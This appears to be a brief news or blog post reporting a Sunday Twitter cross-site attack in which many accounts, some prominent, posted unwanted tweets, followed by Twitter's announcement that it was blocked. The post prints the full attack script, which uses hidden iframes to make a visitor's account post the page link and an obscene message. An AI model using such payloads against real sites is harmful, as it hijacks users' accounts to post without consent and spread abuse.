On Sunday afternoon, a large number of Twitter accounts were compromised after their users were inadvertently lured into viewing a URL that carried the following script:
var el1 = document.createElement('iframe');
var el2 = document.createElement('iframe');
el1.style.visibility="hidden";
el2.style.visibility="hidden";
el1.src = "http://twitter.com/share/update?status=WTF:%20" + window.location;
el2.src = "http://twitter.com/share/update?status=i%20love%20anal%20sex%20with%20goats";
document.getElementsByTagName("body").appendChild(el1);
document.getElementsByTagName("body").appendChild(el2);
Some of the most prominent Twitter posters with very large follower lists, such as @zee, web cartoonist @oatmeal and tech blogger Robert Scoble (@scobleizer), have been affected, along with hundreds of thousands of their followers who also clicked on the malicious links.
I haven't been able to determine if any Mac or iOS or Android users have been compromised by this exploit yet, so please provide me with an update if you use Safari or another Mac browser or alternative OS and you've been hit.
UPDATE: At 1:49 PM EDT on Sunday, Twitter notified users on its status blog that the compromise has been blocked on both the new and old versions of the Twitter web UI, and that it is removing all the tweets sent with the cross-site compromise link and the offensive message.